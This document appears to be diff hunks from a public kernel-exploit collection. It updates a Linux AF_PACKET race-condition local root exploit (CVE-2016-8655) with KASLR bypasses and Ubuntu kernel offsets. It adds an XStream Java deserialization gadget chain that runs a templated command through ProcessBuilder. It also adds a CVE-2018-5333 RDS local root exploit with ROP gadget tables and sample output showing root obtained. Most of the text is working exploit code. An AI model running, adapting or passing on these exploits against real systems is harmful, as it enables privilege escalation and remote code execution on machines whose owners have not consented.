 Linux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 user@ubuntu:~$ id
 uid=1000(user) gid=1000(user) groups=1000(user)
-user@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread
+user@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread -Wall
 user@ubuntu:~$ ./chocobo_root
 linux AF_PACKET race condition exploit by rebel
 kernel version: 4.4.0-51-generic #72
@@ -75,7 +75,7 @@ Updated by <bcoles@gmail.com>
 - check number of CPU cores
 - KASLR bypasses
 - additional kernel targets
-https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
+https://github.com/bcoles/kernel-exploits/tree/master/CVE-2016-8655
 */

 #define _GNU_SOURCE
@@ -85,13 +85,13 @@ https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
 #include <pthread.h>
 #include <sched.h>
 #include <signal.h>
-#include <stdbool.h>
 #include <stdint.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <unistd.h>
-
+#include <linux/if_packet.h>
+#include <netinet/in.h>
 #include <sys/klog.h>
 #include <sys/mman.h>
 #include <sys/types.h>
@@ -102,12 +102,6 @@ https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
 #include <sys/utsname.h>
 #include <sys/wait.h>

-#include <arpa/inet.h>
-#include <linux/if_packet.h>
-#include <linux/sched.h>
-#include <netinet/tcp.h>
-#include <netinet/if_ether.h>
-
 #define DEBUG

 #ifdef DEBUG
@@ -116,9 +110,18 @@ https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
 #  define dprintf
 #endif

-#define ENABLE_KASLR_BYPASS 1
+#define ENABLE_SYSTEM_CHECKS		1
+#define ENABLE_KASLR_BYPASS		1

-// Will be overwritten if ENABLE_KASLR_BYPASS
+#if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN		0xffffffff00000000ul
+#  define KERNEL_BASE_MAX		0xffffffffff000000ul
+#  define ENABLE_KASLR_BYPASS_KALLSYMS	1
+#  define ENABLE_KASLR_BYPASS_SYSLOG	1
+#  define ENABLE_KASLR_BYPASS_MINCORE	1
+#endif
+
+// Will be overwritten if ENABLE_KASLR_BYPASS is enabled (1)
 unsigned long KERNEL_BASE = 0xffffffff81000000ul;

 // Will be overwritten by detect_versions()
@@ -131,6 +134,7 @@ const char *SYSCTL_PATH = "/proc/sys/hack";
 volatile int barrier = 1;
 volatile int vers_switcher_done = 0;

+// kernel target struct
 struct kernel_info {
    char *kernel_version;
    unsigned long proc_dostring;
@@ -139,6 +143,7 @@ struct kernel_info {
    unsigned long set_memory_rw;
 };

+// Targets
 struct kernel_info kernels[] = {
    { "4.4.0-21-generic #37~14.04.1-Ubuntu", 0x084220, 0xc4b000, 0x273a30, 0x06b9d0 },
    { "4.4.0-22-generic #40~14.04.1-Ubuntu", 0x084250, 0xc4b080, 0x273de0, 0x06b9d0 },
@@ -170,6 +175,16 @@ struct kernel_info kernels[] = {
    { "4.4.0-47-generic #68-Ubuntu", 0x088040, 0xe48f80, 0x287800, 0x06f320 },
    //{"4.4.0-49-generic #70-Ubuntu",0x088090,0xe48f80,0x287d40,0x06f320},
    { "4.4.0-51-generic #72-Ubuntu", 0x088090, 0xe48f80, 0x2879a0, 0x06f320},
+
+    { "4.4.0-21-lowlatency #37-Ubuntu",  0x88960, 0xe48e80, 0x28c3a0, 0x6fae0 },
+    { "4.4.0-22-lowlatency #40-Ubuntu",  0x889c0, 0xe48f00, 0x28c570, 0x6fae0 },
+    { "4.4.0-24-lowlatency #43-Ubuntu",  0x88ae0, 0xe48f00, 0x28c9a0, 0x6fae0 },
+    { "4.4.0-28-lowlatency #47-Ubuntu",  0x88b20, 0xe48f80, 0x28ce20, 0x6fae0 },
+    { "4.4.0-31-lowlatency #50-Ubuntu",  0x88b20, 0xe48f80, 0x28cf10, 0x6fae0 },
+    { "4.4.0-34-lowlatency #53-Ubuntu",  0x88b20, 0xe48f80, 0x28cf50, 0x6fae0 },
+    { "4.4.0-36-lowlatency #55-Ubuntu",  0x88b00, 0xe48f80, 0x28cf30, 0x6fad0 },
+    { "4.4.0-38-lowlatency #57-Ubuntu",  0x88bd0, 0xe48f80, 0x28d580, 0x6fad0 },
+    { "4.4.0-42-lowlatency #62-Ubuntu",  0x88c30, 0xe48f80, 0x28d5b0, 0x6faa0 },
 };

 #define VSYSCALL              0xffffffffff600000
@@ -202,6 +217,7 @@ struct tpacket_req3 tp;
 int sfd;
 int mapped = 0;

+// timer_list struct defined in: include/linux/timer.h
 struct timer_list {
    void *next;
    void *prev;
@@ -255,6 +271,10 @@ void *vers_switcher(void *arg)
 #define BUFSIZE 1408
 char exploitbuf[BUFSIZE];

+#ifndef ETH_P_ARP
+#    define ETH_P_ARP 0x0806
+#endif
+
 void kmalloc(void)
 {
    while(1)
@@ -266,7 +286,7 @@ void pad_kmalloc(void)
    int x;
    for (x = 0; x < KMALLOC_PAD; x++)
        if (socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)) == -1) {
-            dprintf("[-] pad_kmalloc() socket error\n");
+            dprintf("[-] pad_kmalloc() socket error: %m\n");
            exit(EXIT_FAILURE);
        }
 }
@@ -289,7 +309,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
    sigaddset(&set, SIGSEGV);

    if (pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {
-        dprintf("[-] couldn't set sigmask\n");
+        dprintf("[-] couldn't set sigmask: %m\n");
        exit(1);
    }

@@ -300,7 +320,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
    fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));

    if (fd == -1) {
-        dprintf("[-] target socket error\n");
+        dprintf("[-] target socket error: %m\n");
        exit(1);
    }

@@ -324,7 +344,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
    sfd = fd;

    if (pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {
-        dprintf("[-] Error creating thread\n");
+        dprintf("[-] Error creating thread: %m\n");
        return 1;
    }

@@ -360,7 +380,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
    pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);

    if (pbd == MAP_FAILED) {
-        dprintf("[-] could not map pbd\n");
+        dprintf("[-] could not map pbd: %m\n");
        exit(1);
    } else {
        off = pbd->hdr.bh1.offset_to_first_pkt;
@@ -415,13 +435,13 @@ void *modify_vsyscall(void *arg)
    sigaddset(&set, SIGSEGV);

    if (pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {
-        dprintf("[-] couldn't set sigmask\n");
+        dprintf("[-] couldn't set sigmask: %m\n");
        exit(EXIT_FAILURE);
    }

    signal(SIGSEGV, catch_sigsegv);

-    *vsyscall = 0xdeadbeef+x;
+    *vsyscall = 0xdeadbeef + x;

    if (*vsyscall == 0xdeadbeef+x) {
        dprintf("[~] vsyscall page altered!\n");
@@ -449,7 +469,7 @@ void verify_stage1(void)
            exit(0);
        }

-        write(2,".",1);
+        write(2, ".", 1);
        sleep(1);
    }

@@ -471,7 +491,7 @@ void verify_stage2(void)
            exit(0);
        }

-        write(2,".",1);
+        write(2, ".", 1);
        sleep(1);
    }

@@ -548,7 +568,29 @@ void wrapper(void)

 // * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *

-void check_procs() {
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+    int f = open(file, O_RDONLY);
+    if (f == -1)
+        return -1;
+    int bytes_read = 0;
+    while (1) {
+        int bytes_to_read = CHUNK_SIZE;
+        if (bytes_to_read > max_length - bytes_read)
+            bytes_to_read = max_length - bytes_read;
+        int rv = read(f, &buffer[bytes_read], bytes_to_read);
+        if (rv == -1)
+            return -1;
+        bytes_read += rv;
+        if (rv == 0)
+            return bytes_read;
+    }
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+void check_env() {
    int min_procs = 2;

    int nprocs = 0;
@@ -559,7 +601,24 @@ void check_procs() {
        exit(EXIT_FAILURE);
    }

-    dprintf("[.] system has %d processor cores\n", nprocs);
+    char buffer[PROC_CPUINFO_LENGTH];
+    char* path = "/proc/cpuinfo";
+    int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+    if (length == -1) {
+        dprintf("[-] open/read(%s): %m\n", path);
+        exit(EXIT_FAILURE);
+    }
+
+    char* found = memmem(&buffer[0], length, "smap", 4);
+    if (found != NULL) {
+        dprintf("[-] SMAP detected, no bypass available\n");
+        exit(EXIT_FAILURE);
+    }
+
+    struct stat st;
+    if (stat("/dev/grsec", &st) == 0) {
+        dprintf("[!] Warning: grsec is in use\n");
+    }
 }

 struct utsname get_kernel_version() {
@@ -573,10 +632,11 @@ struct utsname get_kernel_version() {
 }

 #define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+#define KERNEL_VERSION_SIZE_BUFFER 512

 void detect_versions() {
    struct utsname u;
-    char kernel_version[512];
+    char kernel_version[KERNEL_VERSION_SIZE_BUFFER];

    u = get_kernel_version();

@@ -591,7 +651,7 @@ void detect_versions() {
    }

    char *u_ver = strtok(u.version, " ");
-    snprintf(kernel_version, 512, "%s %s", u.release, u_ver);
+    snprintf(kernel_version, KERNEL_VERSION_SIZE_BUFFER, "%s %s", u.release, u_ver);

    int i;
    for (i = 0; i < ARRAY_SIZE(kernels); i++) {
@@ -607,15 +667,17 @@ void detect_versions() {
 }

 // * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c

+#if ENABLE_KASLR_BYPASS_SYSLOG
 #define SYSLOG_ACTION_READ_ALL 3
 #define SYSLOG_ACTION_SIZE_BUFFER 10

-bool mmap_syslog(char** buffer, int* size) {
+int mmap_syslog(char** buffer, int* size) {
    *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
    if (*size == -1) {
        dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n");
-        return false;
+        return 0;
    }

    *size = (*size / getpagesize() + 1) * getpagesize();
@@ -625,16 +687,17 @@ bool mmap_syslog(char** buffer, int* size) {
    *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
    if (*size == -1) {
        dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n");
-        return false;
+        return 0;
    }

-    return true;
+    return 1;
 }

 unsigned long get_kernel_addr_trusty(char* buffer, int size) {
    const char* needle1 = "Freeing unused";
    char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-    if (substr == NULL) return 0;
+    if (substr == NULL)
+        return 0;

    int start = 0;
    int end = 0;
@@ -642,22 +705,25 @@ unsigned long get_kernel_addr_trusty(char* buffer, int size) {

    const char* needle2 = "ffffff";
    substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-    if (substr == NULL) return 0;
+    if (substr == NULL)
+        return 0;

    char* endptr = &substr[16];
-    unsigned long r = strtoul(&substr[0], &endptr, 16);
+    unsigned long addr = strtoul(&substr[0], &endptr, 16);

-    r &= 0xffffffffff000000ul;
+    addr &= 0xffffffffff000000ul;

-    return r;
+    if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+        return addr;
+
+    return 0;
 }

 unsigned long get_kernel_addr_xenial(char* buffer, int size) {
    const char* needle1 = "Freeing unused";
    char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-    if (substr == NULL) {
+    if (substr == NULL)
        return 0;
-    }

    int start = 0;
    int end = 0;
@@ -666,17 +732,19 @@ unsigned long get_kernel_addr_xenial(char* buffer, int size) {

    const char* needle2 = "ffffff";
    substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-    if (substr == NULL) {
+    if (substr == NULL)
        return 0;
-    }

    char* endptr = &substr[16];
-    unsigned long r = strtoul(&substr[0], &endptr, 16);
+    unsigned long addr = strtoul(&substr[0], &endptr, 16);

-    r &= 0xfffffffffff00000ul;
-    r -= 0x1000000ul;
+    addr &= 0xfffffffffff00000ul;
+    addr -= 0x1000000ul;

-    return r;
+    if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+        return addr;
+
+    return 0;
 }

 unsigned long get_kernel_addr_syslog() {
@@ -699,9 +767,12 @@ unsigned long get_kernel_addr_syslog() {

    return addr;
 }
+#endif

 // * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+// https://grsecurity.net/~spender/exploits/exploit.txt

+#if ENABLE_KASLR_BYPASS_KALLSYMS
 unsigned long get_kernel_addr_kallsyms() {
    FILE *f;
    unsigned long addr = 0;
@@ -713,7 +784,7 @@ unsigned long get_kernel_addr_kallsyms() {
    dprintf("[.] trying %s...\n", path);
    f = fopen(path, "r");
    if (f == NULL) {
-        dprintf("[-] open/read(%s)\n", path);
+        dprintf("[-] open/read(%s): %m\n", path);
        return 0;
    }

@@ -734,58 +805,23 @@ unsigned long get_kernel_addr_kallsyms() {
    dprintf("[-] kernel base not found in %s\n", path);
    return 0;
 }
-
-// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
-
-unsigned long get_kernel_addr_sysmap() {
-    FILE *f;
-    unsigned long addr = 0;
-    char path[512] = "/boot/System.map-";
-    char version[32];
-
-    struct utsname u;
-    u = get_kernel_version();
-    strcat(path, u.release);
-    dprintf("[.] trying %s...\n", path);
-    f = fopen(path, "r");
-    if (f == NULL) {
-        dprintf("[-] open/read(%s)\n", path);
-        return 0;
-    }
-
-    char dummy;
-    char sname[256];
-    char* name = "startup_64";
-    int ret = 0;
-    while (ret != EOF) {
-        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
-        if (ret == 0) {
-            fscanf(f, "%s\n", sname);
-            continue;
-        }
-        if (!strcmp(name, sname)) {
-            fclose(f);
-            return addr;
-        }
-    }
-
-    fclose(f);
-    dprintf("[-] kernel base not found in %s\n", path);
-    return 0;
-}
+#endif

 // * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1431

+#if ENABLE_KASLR_BYPASS_MINCORE
 unsigned long get_kernel_addr_mincore() {
-    unsigned char buf[getpagesize()/sizeof(unsigned char)];
+    unsigned char buf[getpagesize() / sizeof(unsigned char)];
    unsigned long iterations = 20000000;
    unsigned long addr = 0;

    dprintf("[.] trying mincore info leak...\n");
+
    /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
    if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,
-        MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
-        dprintf("[-] mmap()\n");
+          MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+        dprintf("[-] mmap(): %m\n");
        return 0;
    }

@@ -793,46 +829,50 @@ unsigned long get_kernel_addr_mincore() {
    for (i = 0; i <= iterations; i++) {
        /* Touch a mishandle with this type mapping */
        if (mincore((void*)0x86000000, 0x1000000, buf)) {
-            dprintf("[-] mincore()\n");
+            dprintf("[-] mincore(): %m\n");
            return 0;
        }

        int n;
-        for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {
+        for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
            addr = *(unsigned long*)(&buf[n]);
            /* Kernel address space */
-            if (addr > 0xffffffff00000000) {
+            if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
                addr &= 0xffffffffff000000ul;
                if (munmap((void*)0x66000000, 0x20000000000))
-                    dprintf("[-] munmap()\n");
+                    dprintf("[-] munmap(): %m\n");
                return addr;
            }
        }
    }

    if (munmap((void*)0x66000000, 0x20000000000))
-        dprintf("[-] munmap()\n");
+      dprintf("[-] munmap(): %m\n");

    dprintf("[-] kernel base not found in mincore info leak\n");
    return 0;
 }
+#endif

 // * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *

 unsigned long get_kernel_addr() {
    unsigned long addr = 0;

+#if ENABLE_KASLR_BYPASS_KALLSYMS
    addr = get_kernel_addr_kallsyms();
    if (addr) return addr;
+#endif

-    addr = get_kernel_addr_sysmap();
-    if (addr) return addr;
-
+#if ENABLE_KASLR_BYPASS_SYSLOG
    addr = get_kernel_addr_syslog();
    if (addr) return addr;
+#endif

+#if ENABLE_KASLR_BYPASS_MINCORE
    addr = get_kernel_addr_mincore();
    if (addr) return addr;
+#endif

    dprintf("[-] KASLR bypass failed\n");
    exit(EXIT_FAILURE);
@@ -851,7 +891,7 @@ void launch_rootshell(void)
    fd = open(SYSCTL_PATH, O_WRONLY);

    if(fd == -1) {
-        dprintf("[-] could not open %s\n", SYSCTL_PATH);
+        dprintf("[-] open(%s): %m\n", SYSCTL_PATH);
        exit(EXIT_FAILURE);
    }

@@ -877,12 +917,12 @@ void launch_rootshell(void)

 void setup_sandbox() {
    if (unshare(CLONE_NEWUSER) != 0) {
-        dprintf("[-] unshare(CLONE_NEWUSER)\n");
+        dprintf("[-] unshare(CLONE_NEWUSER): %m\n");
        exit(EXIT_FAILURE);
    }

    if (unshare(CLONE_NEWNET) != 0) {
-        dprintf("[-] unshare(CLONE_NEWNET)\n");
+        dprintf("[-] unshare(CLONE_NEWNET): %m\n");
        exit(EXIT_FAILURE);
    }
 }
@@ -890,8 +930,6 @@ void setup_sandbox() {
 int main(int argc, char **argv)
 {
    int status, pid;
-    struct utsname u;
-    char buf[512], *f;

    if (getuid() == 0 && geteuid() == 0) {
        chown("/proc/self/exe", 0, 0);
@@ -908,11 +946,11 @@ int main(int argc, char **argv)

    dprintf("linux AF_PACKET race condition exploit by rebel\n");

-    dprintf("[.] starting\n");
-
-    dprintf("[.] checking hardware\n");
-    check_procs();
-    dprintf("[~] done, hardware looks good\n");
+#if ENABLE_SYSTEM_CHECKS
+    dprintf("[.] checking system\n");
+    check_env();
+    dprintf("[~] done, looks good\n");
+#endif

    dprintf("[.] checking kernel version\n");
    detect_versions();
@@ -0,0 +1,54 @@
+<map>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString>
+      <flags>0</flags>
+      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
+        <dataHandler>
+          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
+            <is class="javax.crypto.CipherInputStream">
+              <cipher class="javax.crypto.NullCipher">
+                <initialized>false</initialized>
+                <opmode>0</opmode>
+                <serviceIterator class="javax.imageio.spi.FilterIterator">
+                  <iter class="javax.imageio.spi.FilterIterator">
+                    <iter class="java.util.Collections$EmptyIterator"/>
+                    <next class="java.lang.ProcessBuilder">
+                      <command>
+                        <%=payload_cmd%>
+                      </command>
+                      <redirectErrorStream>false</redirectErrorStream>
+                    </next>
+                  </iter>
+                  <filter class="javax.imageio.ImageIO$ContainsFilter">
+                    <method>
+                      <class>java.lang.ProcessBuilder</class>
+                      <name>start</name>
+                      <parameter-types/>
+                    </method>
+                    <name>foo</name>
+                  </filter>
+                  <next class="string">foo</next>
+                </serviceIterator>
+                <lock/>
+              </cipher>
+              <input class="java.lang.ProcessBuilder$NullInputStream"/>
+              <ibuffer></ibuffer>
+              <done>false</done>
+              <ostart>0</ostart>
+              <ofinish>0</ofinish>
+              <closed>false</closed>
+            </is>
+            <consumed>false</consumed>
+          </dataSource>
+          <transferFlavors/>
+        </dataHandler>
+        <dataLen>0</dataLen>
+      </value>
+    </jdk.nashorn.internal.objects.NativeString>
+    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+</map>
@@ -0,0 +1,883 @@
+// Local root exploit for Linux RDS rds_atomic_free_op NULL pointer dereference
+// in the rds kernel module in the Linux kernel through 4.14.13 (CVE-2018-5333).
+//
+// Includes KASLR, SMEP, and mmap_min_addr bypasses. No SMAP bypass.
+//
+// Targets:
+// - Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116
+// - Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54
+//
+// The rds kernel module is not loaded by default on Ubuntu, and is blacklisted
+// in /etc/modprobe.d/blacklist-rare-network.conf to prevent autoloading.
+// - install: sudo apt install "linux-image-extra-$(uname -r)-generic"
+// - load:    sudo insmod "/lib/modules/$(uname -r)/kernel/net/rds/rds.ko"
+//
+// This exploit is a modified extension of the original local root
+// proof of concept exploit written by wbowling as an example of using
+// CVE-2019-9213 to make previous kernel bugs exploitable:
+// - https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4
+//
+// The original exploit is based on the null pointer dereference
+// reproducer proof of concept and analysis by 0x36:
+// - https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+//
+// wbowling has done most of the hard work, by utilising Jann Horn's
+// mmap_min_addr bypass technique (CVE-2019-9213), allowing userland to mmap
+// virtual address 0 (without which this bug would not be exploitable on
+// systems with a sufficiently large value for vm.mmap_min_addr);
+// and developing the appropriate ROP chain.
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+//
+// This exploit adds offsets for additional kernels, and introduces some
+// additional features, such as KASLR bypasses and system checks, including:
+// - check if system supports SMAP
+// - check if system supports RDS sockets
+// - Jann Horn's mincore KASLR bypass via heap page disclosure (CVE-2017-16994)
+//   - https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+// - spender's /proc/kallsyms KASLR bypass (requires kernel.kptr_restrict=0)
+//   - https://grsecurity.net/~spender/exploits/exploit.txt
+// - xairy's syslog KASLR bypass (requires kernel.dmesg_restrict=0)
+//   - https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+// - lizzie's perf_event_open KASLR bypass (requires kernel.perf_event_paranoid<2)
+//   - https://blog.lizzie.io/kaslr-and-perf.html
+//
+// Shoutout to nstarke for adding additional kernel offsets.
+// - https://github.com/bcoles/kernel-exploits/pulls?q=author:nstarke+cve-2018-5333
+//
+// This exploit also uses various code patterns copied from:
+// - xairy's exploits:
+//   - https://github.com/xairy/kernel-exploits
+// - vnik's kernel ROP code:
+//   - https://github.com/vnik5287/kernel_rop
+// ---
+// $ gcc cve-2018-5333.c -o cve-2018-5333 -Wall
+// $ ./cve-2018-5333
+// Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)
+// [.] checking kernel version...
+// [.] kernel version '4.4.0-116-generic #140-Ubuntu' detected
+// [~] done, version looks good
+// [.] checking system...
+// [~] done, looks good
+// [.] mapping null address...
+// [~] done, mapped null address
+// [.] KASLR bypass enabled, getting kernel base address
+// [.] trying /proc/kallsyms...
+// [-] kernel base not found in /proc/kallsyms
+// [.] trying syslog...
+// [-] kernel base not found in syslog
+// [.] trying perf_event_open sampling...
+// [.] done, kernel text:   ffffffff9f000000
+// [.] commit_creds:        ffffffff9f0a4cf0
+// [.] prepare_kernel_cred: ffffffff9f0a50e0
+// [.] mmapping fake stack...
+// [~] done, fake stack mmapped
+// [.] executing payload 0x402119...
+// [+] got root
+// # id
+// uid=0(root) gid=0(root) groups=0(root)
+// ---
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2018-5333
+// <bcoles@gmail.com>
+
+#define _GNU_SOURCE
+
+#include <fcntl.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <linux/perf_event.h>
+#include <netinet/in.h>
+#include <sys/ioctl.h>
+#include <sys/klog.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/utsname.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define ENABLE_SYSTEM_CHECKS            1
+#define ENABLE_KASLR_BYPASS             1
+
+#if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN               0xffffffff00000000ul
+#  define KERNEL_BASE_MAX               0xffffffffff000000ul
+#  define ENABLE_KASLR_BYPASS_KALLSYMS  1
+#  define ENABLE_KASLR_BYPASS_SYSLOG    1
+#  define ENABLE_KASLR_BYPASS_PERF      1
+#  define ENABLE_KASLR_BYPASS_MINCORE   1
+#endif
+
+// Can be overwritten by argv[1]
+char *SHELL = "/bin/sh";
+
+// Will be overwritten if ENABLE_KASLR_BYPASS is enabled (1)
+unsigned long KERNEL_BASE = 0xffffffff81000000ul;
+
+// Will be overwritten by detect_versions().
+int kernel = -1;
+
+// kernel target struct, using ROP chain from wbowling's exploit
+struct kernel_info {
+  const char* kernel_version;
+  uint64_t commit_creds;
+  uint64_t prepare_kernel_cred;
+  uint64_t xor_rdi;     //: xor edi, edi ; ret
+  uint64_t mov_rdi_rax; //: mov rdi, rax ; pop rbx ; mov rax, rdi ; pop r12 ; pop rbp ; ret
+  uint64_t xchg_esp;    //: xchg eax, esp ; shr bl, 0xbf ; xor eax, eax ; pop rbp ; ret
+  uint64_t swapgs;      //: swapgs ; pop rbp ; ret
+  uint64_t iretq;       //: iretq
+};
+
+// Targets
+struct kernel_info kernels[] = {
+  { "4.4.0-21-generic #37-Ubuntu",   0xa21c0, 0xa25b0, 0x5d0c5, 0x178157, 0x3f8158, 0x64644, 0x4cc7da },
+  { "4.4.0-22-generic #40-Ubuntu",   0xa2220, 0xa2610, 0x5d0c5, 0x178217, 0x3f89e8, 0x64644, 0x7d005  },
+  { "4.4.0-24-generic #43-Ubuntu",   0xa2340, 0xa2730, 0x5d0c5, 0x178447, 0x3f98b8, 0x64644, 0x7d125  },
+  { "4.4.0-28-generic #47-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x178717, 0x3f9f38, 0x64644, 0x585dc  },
+  { "4.4.0-31-generic #50-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x1787a7, 0x3ffed8, 0x64644, 0x7d125  },
+  { "4.4.0-38-generic #57-Ubuntu",   0xa2570, 0xa2960, 0x5d0c5, 0x178a97, 0x400968, 0x64634, 0x7d1e5  },
+  { "4.4.0-42-generic #62-Ubuntu",   0xa25c0, 0xa29b0, 0x5d0c5, 0x178ac7, 0x400d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-98-generic #121-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x17a427, 0x40a138, 0x64694, 0x4b243  },
+  { "4.4.0-108-generic #131-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-109-generic #132-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-112-generic #135-Ubuntu", 0xa3a90, 0xa3e80, 0x5d0c5, 0x17b657, 0x40b238, 0x646a4, 0x54137c },
+  { "4.4.0-116-generic #140-Ubuntu", 0xa4cf0, 0xa50e0, 0x5e0c5, 0x17d5d7, 0x40ed08, 0x65734, 0x3a5b04 },
+
+  /* Untested:
+  { "4.4.0-51-generic #72-Ubuntu",   0xa2670, 0xa2a60, 0x5d0c5, 0x178cf7, 0x404d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-62-generic #83-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179747, 0x406a78, 0x64634, 0x7d1e5  },
+  { "4.4.0-63-generic #84-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-66-generic #87-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-70-generic #91-Ubuntu",   0xa27b0, 0xa2ba0, 0x5d0c5, 0x179847, 0x4070c8, 0x64664, 0x406eb  },
+  { "4.4.0-79-generic #100-Ubuntu",  0xa2800, 0xa2bf0, 0x5d0c5, 0x179a67, 0x408338, 0x64664, 0x7d235  },
+  { "4.4.0-87-generic #110-Ubuntu",  0xa2860, 0xa2c50, 0x5d0c5, 0x179ca7, 0x408768, 0x64694, 0x7d285  },
+  { "4.4.0-89-generic #112-Ubuntu",  0xa28a0, 0xa2c90, 0x5d0c5, 0x179d27, 0x408ae8, 0x64694, 0x7d265  },
+  { "4.4.0-96-generic #119-Ubuntu",  0xa28c0, 0xa2cb0, 0x5d0c5, 0x179e27, 0x409a48, 0x64694, 0x7d235  },
+  { "4.4.0-97-generic #120-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x179e47, 0x409a58, 0x64694, 0x4ed41  },
+  */
+
+  { "4.4.0-21-lowlatency #37-Ubuntu",   0xa3150, 0xa3560, 0x5e0c5, 0x17b2c7, 0x401288, 0x64d34, 0x7d95c },
+  { "4.4.0-22-lowlatency #40-Ubuntu",   0xa31c0, 0xa35d0, 0x5e0c5, 0x17b397, 0x401b48, 0x64d34, 0x7d9bc },
+  { "4.4.0-24-lowlatency #43-Ubuntu",   0xa32e0, 0xa36f0, 0x5e0c5, 0x17b5e7, 0x402958, 0x64d34, 0x7dadc },
